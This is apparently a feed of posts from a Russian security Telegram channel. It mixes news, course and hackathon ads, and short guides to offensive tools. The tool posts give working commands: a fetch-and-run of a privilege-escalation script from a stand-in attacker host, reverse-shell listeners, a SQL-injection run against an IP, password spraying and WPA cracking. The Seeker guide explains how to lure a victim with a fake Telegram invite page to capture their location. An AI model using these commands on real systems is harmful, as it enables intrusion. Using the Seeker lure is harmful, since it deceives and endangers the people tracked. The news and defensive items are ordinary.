Роскомнадзор работает над созданием национальной системы защиты IР-маршрутизации от внешних угроз. (это следует из Стратегии развития телекоммуникационной отрасли до 2035 г., утвержденной Правительством).
🔑Предполагаем, что речь идет о создании в России инфраструктуры для протокола
▶️RPKI (Resource Public Key Infrastructure/Инфраструктура открытых ключей ресурсов),
решение является расширением протокола
▶️BGP (Border Gateway Protocol/Протокол динамической маршрутизации), отвечающего за динамическую маршрутизацию в интернете.
⚡️Согласно заявлению ведомства, новая система обеспечит надежную защиту российских сетей от атак типа "DDoS", от попыток манипулирования трафиком и подмены IР-адресов.
🆕 Новые технологии, которые планируют внедрить в рамках данного проекта:
⏺️Система раннего обнаружения атак (мониторинг трафика для выявления подозрительной активности и блокирования атак на ранней стадии).
⏺️Централизованная система управления маршрутизацией (повышение устойчивости интернет-инфраструктуры путем распределения трафика и предотвращения перегрузок).
⏺️Система защиты от DNS-подмены (предотвращение подмены DNS-записей, которые могут перенаправлять пользователей на вредоносные сайты).
❗️Проект позволит значительно повысить уровень кибербезопасности в России и обеспечить надежную защиту российских пользователей от внешних угроз.
Участвуй в «Совкомбанк SecureHack» с призовым фондом 300 000 рублей и внеси свой вклад в разработку решения для защиты информационных систем Совкомбанка!
Регистрация на хакатон открыта до 4 декабря включительно: ссылка на регистрацию
Хакатон рассчитан на специалистов уровня Middle и выше — экспертов по информационной безопасности, системных аналитиков, разработчиков и архитекторов ПО с опытом в оценке безопасности. Участвуйте индивидуально или в командах до 3-х человек.
Основная задача — разработать инструмент для оценки безопасности информационных систем банка, который будет полезен как для разработчиков и аналитиков ИБ, так и для проектных менеджеров. Основные требования:
🔹 Принимать на вход различные данные, такие как опросники и карты сетевых доступов.
🔹 Проводить анализ введенных данных для выявления уязвимостей и рисков информационной безопасности.
🔹 Формировать отчет с заключением об уровне безопасности, описанием существующих рисков и рекомендациями по его улучшению.
Вы сможете:
▪️ Побороться за призовой фонд в 300 000 рублей.
▪️ Решить практическую задачу с использованием современных инструментов и подходов к безопасности.
▪️ Расширить свои компетенции и поработать с командой над междисциплинарным проектом.
▪️Показать свои навыки ведущим ИБ-специалистам и получить шанс присоединится к команде Совкомбанк Технологии
Таймлайн хакатона:
🔸 до 4 декабря — регистрация участников
🔸 6 декабря — старт работы над задачей
🔸 15 декабря — завершение загрузки решений
🔸 19 декабря — награждение победителей
Стань автором решения, которое повысит безопасность цифровых сервисов Совкомбанка, и покажи свои способности на практике! Успей зарегистрироваться до 4 декабря: https://cnrlink.com/securehackcodeby
Реклама. ПАО "Совкомбанк". ИНН: 4401116480. erid: LjN8K7KUY
WebTTY
WebTTY – инструмент, обеспечивающий доступ к администрированию удаленных устройств с помощью технологии WebRTC, то есть подключение к другому устройству может происходить без настройки прокси-сервера и наличия открытых портов SSH. Рассмотрим как осуществить удаленное подключение через браузер.
Особенности инструмента:
🔸 Возможность работы WebTTY в браузере, что позволяет обойти защитные меры фаерволла. Подключение происходит через страницу https://maxmcd.github.io/webtty/.
🔸 Шифрование передаваемых данных засчёт использования технологии WebRTC.
🔸 Работа в одностороннем и двухстороннем соединении.
✏️ Принцип работы:
1. На стороне сервера запускается WebTTY, который генерирует необходимые данные для установления WebRTC-соединения (SDP-описание).
2. Данные передаются клиенту, который в свою очередь генерирует свой ответ серверу(оффер).
3. После успешного обмена соединениями клиент получает доступ к командной строке сервера через веб-интерфейс.
Уточнение! Обмен необходимо производить копируя ключи вручную.
Установка и запуск
🔸Скачаем архив и распакуем утилиту с помощью команды:
tar -xvzf webtty_0.5.1_Linux_x86_64.tar.gz
./webtty
🔄😟 GTFONow v 0.3.0
Авто повышение привилегий на .nix подобных системах используя мисконфигурации в setuid/setgid файлах, capabilities и sudo привилегиях.
Разработано специально для CTF, но может использоваться и в реальных условиях. Информацию берет с известного ресурса GTFO
Использование:
python gtfonow.py [OPTIONS]
python gtfonow.py --command 'ls -la' --level 2 --risk 2
curl http://attacker.host/gtfonow.py | python
💻 pwncat-cs v0.5.4
Что не так с netcat ?
Пример классического подключения:
nc 1.1.1.1 4444
remote$ python -c "import pty; pty.spawn('/bin/bash')"
remote$ Ctrl + Z
local$ stty raw -echo
local$ fg
Надоело ? Мне тожеpython3 -m venv pwncat-env
source pwncat-env/bin/activate
pip install pwncat-cs
# Connect to a bind shell
pwncat-cs 10.10.10.10:4444
# Listen for reverse shell
pwncat-cs -lp 4444
# Connect via ssh
pwncat-cs user@10.10.10.10
pwncat-cs user:password@10.10.10.10
pwncat-cs -i id_rsa user@10.10.10.10
# SSH w/ non-standard port
pwncat-cs -p 2222 user@10.10.10.10
pwncat-cs user@10.10.10.10:2222
# Reconnect utilizing installed persistence
# If reconnection fails and no protocol is specified,
# SSH is used as a fallback.
pwncat-cs reconnect://user@10.10.10.10
pwncat-cs reconnect://user@c228fc49e515628a0c13bdc4759a12bf
pwncat-cs user@10.10.10.10
pwncat-cs c228fc49e515628a0c13bdc4759a12bf
Табы работают, по Ctrl + C сессия не рвется.
Переключение между режимами(local <> remote) Ctrl + D
Есть полезные фичи как Upload с хоста на жертву, так и наоборот Download.
Модули escalate и enumerate для ленивых
run enumerate types=file.suid
run enumerate
🚩 Новые задания на платформе Codeby Games!
🔑 Категория Криптография — Широковещание
🔎 Категория OSINT — Кого ищем?
Приятного хакинга!
🤖 PentestGPT - это инструмент тестирования на проникновение, предоставляемый ChatGPT. Он предназначен для автоматизации процесса тестирования на проникновение. Он построен на основе ChatGPT и работает в интерактивном режиме. Данная утилита способна самостоятельно решать легкие и средние машины на HTB
🔸 Установка утилиты
pip3 install git+https://github.com/GreyDGL/PentestGPT
shell export OPENAI_API_KEY='<your key here>'
pentestgpt-connection
pentestgpt --reasoning_model=gpt-4-turbo
🔄 💻 Ghauri v1.3.8
🔺 Продвинутый кроссплатформенный инструмент, автоматизирующий процесс обнаружения и эксплуатации 🔥 SQL-инъекций.
Поддерживаемые техники:
Boolean based
Error Based
Time Based
Stacked Queries
MySQL
Microsoft SQL Server
Postgres
Oracle
GET/POST
Headers
Cookies
Mulitipart Form data
JSON
SOAP/XML
--sql-shell
--proxy
git clone https://github.com/r0oth3x49/ghauri.gitЧитать полностью…
python3 -m pip install --upgrade -r requirements.txt
python3 setup.py install
ghauri -u 'http://62.173.140.174:16015/user.php?login=asd&password=asd' --batch -v 2 --dbs
Уважаемые клиенты, ввиду блокировки Cloudflare часть наших сайтов временно недоступна без VPN. В том числе и codeby.school. Наши инженеры в курсе проблемы и обещают ее решить в течение часа.
Читать полностью…😎 Напоминаем, на каких курсах начинается обучение в ноябре:
🌟 6 ноября: Курс «Введение в Реверс инжиниринг» (Запись до 16 ноября)
🌟 7 ноября: Курс «Боевой OSINT»
🌟 11 ноября: Курс «Основы Linux»
🌟 25 ноября: Курс «Цифровая криминалистика и реагирование на инциденты ОС Linux (DFIR)»
✔️ Запись на курс «Специалист центра мониторинга инцидентов информационной безопасности (SOC)» продлится до 7 ноября!
Внимание! До конца ноября у вас есть возможность купить курсы декабря по старым ценам*:
🔸2 декабря: Курс «Тестирование Веб-Приложений на проникновение (WAPT)»
🔸16 декабря: Курс «Анализ защищенности инфраструктуры на основе технологий Active Directory»
*С декабря стоимость курсов увеличится на 10%
🔔 Запишитесь у нашего менеджера @Codeby_Academy 🚀 или узнайте подробности на сайте!
Исследователи кибербезопасности обнаружили новую волну атак, в которых злоумышленники эксплуатируют API DocuSign для отправки поддельных счетов. В отличие от традиционного фишинга, здесь преступники создают подлинные аккаунты и используют шаблоны DocuSign, чтобы выдавать себя за известные бренды и обходить защитные фильтры 💱
👀 Новый уровень фишинга
Вместо поддельных писем с вредоносными ссылками, эти атаки используют реальные сервисы для создания доверия.
🗣️ К примеру, как сообщает Wallarm, киберпреступники открывают платные аккаунты DocuSign и настраивают шаблоны для имитации счетов от компаний, таких как Norton Antivirus.
Seeker
Seeker - инструмент для определения точного местонахождения человека. Модель походит на фишинговую, жертве отправляется специальная ссылка по которой ей нужно перейти, затем он попадает на сайт и тогда нужно чтобы жертва разрешила доступ к геолокации в контекстном окошке браузера, если жертва не знает английский, это нам на руку.
Создаем фейковую страницу приглашения в беседу для telegram, название ей "Выпускники 11 "А".
🔸 Установка утилиты
git clone https://github.com/thewhiteh4t/seeker
cd seeker/
python3 seeker.py
ngrok строго относится к тому, что на нём запускают.
Скачиваем архив и командой разорхивируем его: sudo tar -xvzf ~/Downloads/ngrok.tgz -C /usr/local/bin
ngrok config add-authtoken <token>
ngrok http 8080Читать полностью…
🚩 Новые задания на платформе Codeby Games!
🖼 Категория Стеганография — Тайна пикселей
🏆 Категория Квесты — Симпсоны
Приятного хакинга!
Новый CTF-марафон от «Доктор Веб»!
Уже второй год подряд компания организует CTF-марафон для студентов и молодых IT-специалистов.
CTF-марафон пройдет в онлайне с 00:00 воскресенья 3 ноября и до 23:59 субботы 16 ноября 2024 года. Регистрация уже открыта по ссылке ✅
Победителей ждут ценные призы, а главной наградой за успешное взятие флагов может стать должность вирусного аналитика в компании «Доктор Веб» и возможность решать уже не игровые, а боевые задачи в команде антивирусной лаборатории Dr.Web.
Вас ждут 16 заданий, связанных с реверс-инжинирингом и анализом файлов, если вы готовы к непростым, но увлекательным задачам — регистрируйтесь, и пусть победит сильнейший!
29 октября Apple выпустила критическое обновление безопасности для 90 своих сервисов и операционных систем, включая macOS, iOS, iPadOS, watchOS, tvOS и visionOS. Обновления также коснулись Safari и iTunes. Это обновление устраняет множество уязвимостей, которые могли поставить под угрозу конфиденциальность и безопасность пользователей.
Что нового?
🔸 macOS: Исправлены уязвимости, которые позволяли злоумышленникам получить доступ к контактам, конфиденциальным данным геолокации через сервис Find My и утечкам критических данных ядра. Некоторые из них также устраняли возможность атаки отказа в обслуживании (DoS) при открытии вредоносных изображений.
🔸 Safari: Закрыты дыры, позволявшие утечку истории просмотров в режиме Private Browsing.
🔸 iOS и iPadOS: Устранены баги, которые позволяли просматривать личные данные, даже если устройство заблокировано. Среди уязвимостей — проблема с Siri, из-за которой можно было просматривать фотографии контактов.
🔸 visionOS 2.1: Обновление включает исправления более чем 25 уязвимостей, некоторые из которых позволяли выполнение произвольного кода, доступ к конфиденциальной информации и даже полный сбой системы.
🗣️ Apple подчеркивает, что своевременное обновление ПО — это ключ к защите устройств и данных. Исследователи из таких компаний, как Trend Micro, CrowdStrike, Alibaba и JD.com, внесли значительный вклад в обнаружение и устранение этих уязвимостей.
Для компании утечка данных — это не только риск потери информации, но и серьёзные репутационные и финансовые последствия. Все об утечке данных читайте в новой статье.
🗣️ Когда злоумышленники получают доступ к персональной, финансовой или коммерческой информации, последствия для бизнеса могут быть разрушительными: от потери клиентов до временной остановки бизнес-процессов.
🔄 💻 reconFTW v2.9
Инструмент все в одном для автоматического исследования хоста путем запуска наилучшего набора средств сканирования и обнаружения уязвимостей
🏃♂️ Установка:
git clone https://github.com/six2dez/reconftw
cd reconftw/
./install.sh
./reconftw.sh -d target.com -r
# Single Target
sudo ./reconftw.sh -d target.com -r
# List of Targets
sudo ./reconftw.sh -l sites.txt -r -o /output/directory/
# Yolo mod (all tasks)
sudo ./reconftw.sh -d target.com -a
#Deep scan
./reconftw.sh -d target.com -r --deep -o /output/directory/
# Recon in a multi domain target
./reconftw.sh -m company -l domains_list.txt -r
# Osint
Domain information
Emails addresses and passwords leaks
Metadata finder
API leaks search
# Subdomains
Certificate transparency
NOERROR subdomain discovery
Bruteforce
Permutations
JS files & Source Code Scraping
DNS Records
# Hosts
IP info
CDN checker
WAF checker
Port Scanner
Port services vulnerability checks
Password spraying
Geolocalization info
# Webs
Web Prober
Web screenshoting
Web templates scanner
CMS Scanner
Url extraction
Favicon Real IP
Fuzzing
Wordlist generation
Passwords dictionary creation
# Vulnerability checks
XSS
Open redirect
SSRF
CRLF
Cors
LFI Checks
SQLi Check
SSTI
SSL tests
4XX Bypasser
Теперь данные пользователей на hh.ru защищены ещё лучше.
В знаковый для рынка труда момент HeadHunter объявила о присоединении к Отраслевому стандарту защиты данных, разработанному Ассоциацией больших данных.
Отраслевой стандарт представляет собой свод рекомендаций и практических мер, направленных на установление стандартов для хранения и защиты данных. Он помогает оценить эффективность процессов в системе информационной безопасности и внедрять лучшие практики.
Соглашение было подписано 11 ноября 2024 года в Москве. «Будучи одной из крупнейших платформ по поиску работы, HeadHunter обрабатывает и хранит огромный массив персональных данных», — отметила директор по информационным технологиям и кибербезопасности hh.ru Татьяна Фомина. «Присоединение к стандарту – это подтверждение нашей приверженности защите информации и повышению уровня доверия к платформе».
#новости
На форуме запустили лотерею, где можно выиграть любой курс Академии Кодебай, стартующий в декабре 2024 года. Как только будет разыграно 6 подписок на курс, лотерея будет остановлена. Розыгрыш каждые 3 дня до конца ноября 2024 года.
Нажмите "Купить билет" и выберите 7 цифр, после чего нажмите кнопку "Приобрести".
Быстро заработать на билет можно приглашая участников форума. За каждого реферала начисляем 25 BIT. Ссылка для приглашения находится у вас в профиле форума.
Chisel — это многофункциональная утилита для создания защищенных туннелей TCP/UDP поверх HTTP и HTTPS. Если вам нужно обойти firewall или организовать безопасную точку доступа в сети, Chisel может стать отличным решением. В новой статье разберем подробнее этот инструмент.
🔍 Что такое Chisel и как это работает?
Chisel — это компактное приложение, объединяющее в себе клиент и сервер для туннелирования TCP и UDP трафика. Используя HTTP или HTTPS, Chisel проходит через firewall, маскируясь под стандартный веб-трафик и работая поверх WebSocket. Это позволяет обмениваться данными через часто разрешенные порты (80 или 443), делая трафик менее заметным для фильтров.
❓ Почему это трудно обнаружить?
Chisel отправляет данные в зашифрованных WebSocket фреймах через стандартные порты. Даже глубокая проверка пакетов (DPI) часто не видит, что внутри трафика, так как данные зашифрованы и выглядят как обычная HTTPS-сессия. Это помогает обойти ограничения сети, включая NAT и прокси.
⚙️ Практическое применение Chisel
Для того чтобы разобраться, как это работает, мы проведем небольшой эксперимент с сервером и клиентом на Linux, установим Chisel и настроим туннель. В конце анализа разберем захваченный трафик и посмотрим, как Chisel шифрует его на уровне фреймов.
➡️ Читать подробнее
Исследователи из CloudSEK выявили тревожное обновление в деятельности ботнета Androxgh0st: с начала 2024 года он нацелен на веб-серверы и активно эксплуатирует уязвимости в известных технологиях, таких как Cisco ASA, Atlassian JIRA и различные PHP-фреймворки.
🗣️ Недавний отчет показал, что Androxgh0st теперь использует компоненты от ботнета Mozi, расширяя своё влияние на устройства интернета вещей (IoT) и возможное сотрудничество между двумя ботнетами.
🔥 Это всё меняет!
Positive Technologies 20 ноября запустит PT NGFW. Станьте частью этого масштабного события!
🤟 Два года компания разрабатывала высокопроизводительный и надежный межсетевой экран нового поколения.
Команда прислушивалась к мнению клиентов и партнеров, открыто рассказывала про внутреннюю кухню разработки. Смело бралась за сложные инженерные задачи, уделяла внимание не только коду, но и аппаратной платформе.
В результате они создали совершенное устройство, которое запустят 20 ноября!
👀 На онлайн-запуске вы сможете окунуться в историю создания продукта, узнать, как он защищает от киберугроз, результаты тестирования и завершенных проектов, а также планы на будущее.
Регистрируйтесь на онлайн-запуск заранее на сайте Positive Technologies.
Будем ждать каждого! 🤩
Расширение Hide YouTube Shorts для Chrome после смены владельца стало вредоносным. Вредоносный код был добавлен сразу после смены владельца. В результате чего, плагин начал заниматься мошенничеством с партнёрскими программами и отправлять псевдонимизированные данные пользователей на облачный сервер Amazon. Партнерское мошенничество направлено на генерацию прибыли, используя домен kra18[.]com, который заменяет ссылки на реферальные.
Список некоторых из затронутых популярных расширений:
⏺️Hide YouTube Shorts
⏺️Dynamics 365 Power Pane
⏺️Karma | Online shopping, but better
⏺️Visual Effects for Google Meet
⏺️M3U8 Downloader
Расширения стали вредоносными после передачи прав в середине 2023 года. Особое внимание вызывает расширение Karma.
👀 Вредоносный код в расширениях не был обфусцирован или замаскирован. Каждая часть кода по отдельности выглядит довольно безобидно, но в совокупности внедрённые функции приводят к нелегитимным воздействиям.
❓Зачем Karma Shopping нужны данные о пользователях?
Во-первых, партнёрские комиссии — это их основной вид деятельности и их целью является увеличение числа пользователей. Во-вторых, исходя из политики конфиденциальности компании, сбор данных о посещенных страницах является официальным и Karma утверждает, что продаёт эти данные третьим лицам, для более точного предоставления услуг пользователям.
⚙️ Несмотря на жалобы пользователей Google не реагирует.
Оповещение о проблеме происходит в формате заполнения формы, в которой причинами недовольства расширением служит «не соответствует ожиданиям» или «недружелюбное содержимое». Более точные и детализированные отзывы остаются без ответа.
#новости
🚨 Социальная инженерия и OSINT в VK: раскрытие методов и инструментов
В новой статье мы покажем два подхода, которые используют OSINT-специалисты для сбора информации в VK. На примере реального кейса разберём, как можно получить максимум данных, начиная с простого никнейма или фотографии.
✉️ Пассивный сбор данных: Узнаем, как найти профиль по никнейму, применяя Google Dork, Web Archive и полезные боты для анализа закрытых страниц. Покажем инструменты для поиска по фото, такие как FindClone и search4faces, чтобы отыскать людей даже с минимальными данными.
✏️ Активный сбор данных с помощью социальной инженерии: Расскажем, как можно использовать хитрые ссылки и инструменты, такие как StormBreaker, чтобы получить дополнительную информацию о цели.
➡️ Читать подробнее
➡️ Стать экспертом по OSINT
на обновленном курсе Академии здесь
Растет тенденция использования кибергруппировками в атаках сертификатов с расширенной проверкой (EV). Основные злоупотребления включают использование кодовых подписей для обхода мер безопасности, получения привилегий и создания доверия у пользователей. Злоумышленники могут приобретать EV-сертификаты на теневых рынках за $2000-6000. Получение сертификатов возможно через создание фиктивных компаний или кражу подписей у реальных организаций, как это произошло с NVIDIA, которые затем использовались в реальных атаках. Это позволяет им подписывать вредоносное ПО и распространять его под видом легитимного.
Злоумышленники используют купленные электронные подписи для:
🔸Обхода антивирусных проверок и повышения доверия к их программам.
🔸Получения административных привилегий в операционных системах.
🔸Публикации вредоносного кода, который выглядит как подписанный легитимным разработчиком, что снижает подозрения у пользователей и систем безопасности
Чтобы снизить риски специалисты Intrinsec рекомендуют:
🔸 Строгие правила белого и черного списков приложений.
🔸 Тщательная проверка валидности сертификатов.
🔸 Проверка отзыва сертификатов.
🔸 Использование репутационной аналитики для обнаружения вредоносных сертификатов.
🔸 Применение техники песочниц и изоляции для неизвестных исполняемых файлов
Для блокировки недоверенных сертификатов в Windows используются следующие механизмы:
🔸Контроль доступа к сертификатам через Certificate Trust Lists (CTL), которые позволяют доверять только определенным сертификатам или блокировать недоверенные.
🔸 Групповые политики: через Group Policy можно настроить блокировку исполняемых файлов, подписанных недоверенными сертификатами.
🔸 SmartScreen: технология, которая проверяет цифровые подписи приложений и блокирует их, если сертификаты недоверенные или отозваны.
🔸 AppLocker: позволяет настроить правила для запуска только тех приложений, которые подписаны доверенными сертификатами.
K2 Cloud + DevOops Conf = бесплатный день конференции для инженеров 💜
Ребята из K2 Cloud помогли организовать Community Day для DevOps-специалистов. 6 ноября ты сможешь бесплатно послушать часть докладов конференции DevOops: от основ работы сертификатов до организации Flux CD monorepo. Для участия нужно только зарегистрироваться.
Подробнее на сайте
Нет времени объяснять, регистрируйся на МТС True Tech Champ 🚀
Осталось несколько дней до шоу финала ИТ-чемпионата.
Дата: 8 ноября
Место: МТС Live Холл
Формат: Офлайн + Онлайн
Участников ждут:
🤖 Шоу с гонкой роботов в интерактивных лабиринтах
🕹 20+ активностей для кодеров и фанатов технологий
🧠 Выступления спикеров, воркшопы, плохие прогерские шутки
Тебе точно понравится, если ты:
— Занимаешься разработкой
— Интересуешься технологиями
— Планируешь построить карьеру в ИТ
До конца регистрации несколько дней — успей присоединиться: https://truetechchamp.ru/conf
Исследовательская группа Sysdig Threat Research Team (TRT) сообщает о глобальной атаке под кодовым названием Emeraldwhale, нацеленной на уязвимые Git-конфигурации. В результате этой операции злоумышленники похитили более 15,000 учетных данных для облачных сервисов, а также смогли клонировать более 10,000 приватных репозиториев.
⌛ Масштаб утечки
Украденные данные включают широкий спектр сервисов, от облачных провайдеров до почтовых платформ. Похищенные учетные данные активно используются в фишинговых и спам-кампаниях, а также продаются на подпольных рынках, где стоимость аккаунта может достигать сотен долларов.
⚙️ Инструменты и тактика атакующих
В ходе расследования Sysdig обнаружил, что злоумышленники использовали автоматизированные инструменты для поиска открытых Git-конфигураций и файлов .env, содержащих учетные данные. С помощью таких инструментов, как httpx и специализированных сканеров, Emeraldwhale смогли получать доступ к закрытым репозиториям и извлекать ключи для дальнейших атак.
🗣️ Атака Emeraldwhale показала, что одних мер по защите секретов недостаточно — критически важно отслеживать действия всех учетных записей с доступом к конфиденциальной информации. В противном случае утечка данных может стать точкой входа для широкомасштабных атак.
Aircrack-ng👩💻
Aircrack-ng - это инструмент, который используется для безопасности и взлома Wi-Fi сетей. Это всё в одном - сниффер пакетов, взломщик WEP и WPA/WPA2, инструмент анализа и инструмент захвата хэшей. Он помогает захватывать пакеты и считывать из них хэши и даже взламывать эти хэши с помощью различных атак, таких как атаки по словарю.
Может работать в 4 режимах:
Режим монитора - Мониторит передачу пакетов и захватывает их, пока не поймает определённый файл с хэшем.
Режим атаки - Создаёт поддельные точки доступа и выполняет деаунтификацию.
Режим тестировки - Проверка вашей сетевой карты на совместимость и исправность, относительно работы программы.
Режим взлома - взламывет WEP или WPA PSK.
🔸Для вывода листа доступных сетевых интерфейсов, можно просто написать:
airmon-ng
airmon-ng stop <INTERFACE>
airmon-ng start <INTERFACE> <CHANNEL>
airodump-ng -c <CHANNEL> --bssid <BSSID> -w psk <INTERFACE>
aircrack-ng -w <PATH_T0_WORDLIST> <HANDSHAKE>Читать полностью…
😎 Кодебай на Kuban CSC 2024. Как это было?
На прошлой неделе завершилась международная конференция по кибербезопасности Kuban CSC 2024, и мы рады поделиться с вами, как она прошла!
В этом году Кодебай выступал генеральным партнером мероприятия, поддерживая всё – от организации CTF-соревнований до открытия нашего фирменного стенда, где собрались сотни участников.
ℹ️ CTF-соревнования от Кодебай
Наши специалисты подготовили уникальную площадку для соревнований по практической информационной безопасности – KubanCTF-2024, в которой приняли участие команды студентов и школьников со всей России. На этой площадке в августе прошел отборочный этап, а в этом октябре более 20 команд сражались за призовые места!
🗣️ "Это была отличная возможность для молодых специалистов испытать свои силы и получить ценный опыт в решении реальных задач кибербезопасности." — Магомед-Эми, создатель CTF-заданий для KubanCTF 2024🎉 Розыгрыш призов на стенде Кодебай
🗣️ "Мы — те самые ребята, которые взламывают ваши компании и дают рекомендации как закрыть уязвимости." — Сергей Попов, генеральный директор и основатель "Кодебай"